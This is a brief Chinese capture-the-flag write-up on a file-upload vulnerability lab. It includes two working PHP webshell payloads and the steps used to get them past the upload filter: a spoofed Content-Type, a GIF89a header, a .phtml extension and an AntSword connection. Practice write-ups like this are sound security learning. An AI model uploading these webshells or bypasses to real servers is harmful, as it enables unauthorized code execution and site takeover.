打开环境是一个上传图片的页面。
那就应该是文件上传了
传一句话木马试试
<?php eval($_POST['SQNU'])?>
提示不是图片
然后抓包改一下文件格式
类比DVWA里的中级文件上传漏洞
将Content-Type里面的格式改为image/jpeg
但是还没有上传成功
应该是有一些过滤
查找大佬文章
改了一下木马和文件后缀.phtml
GIF89a? <script language="php">eval($_REQUEST[1])</script>
phtml后缀作用
phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析
然后上传成功
哈哈
用蚁剑连一下
在根目录下找到flag
棒!!!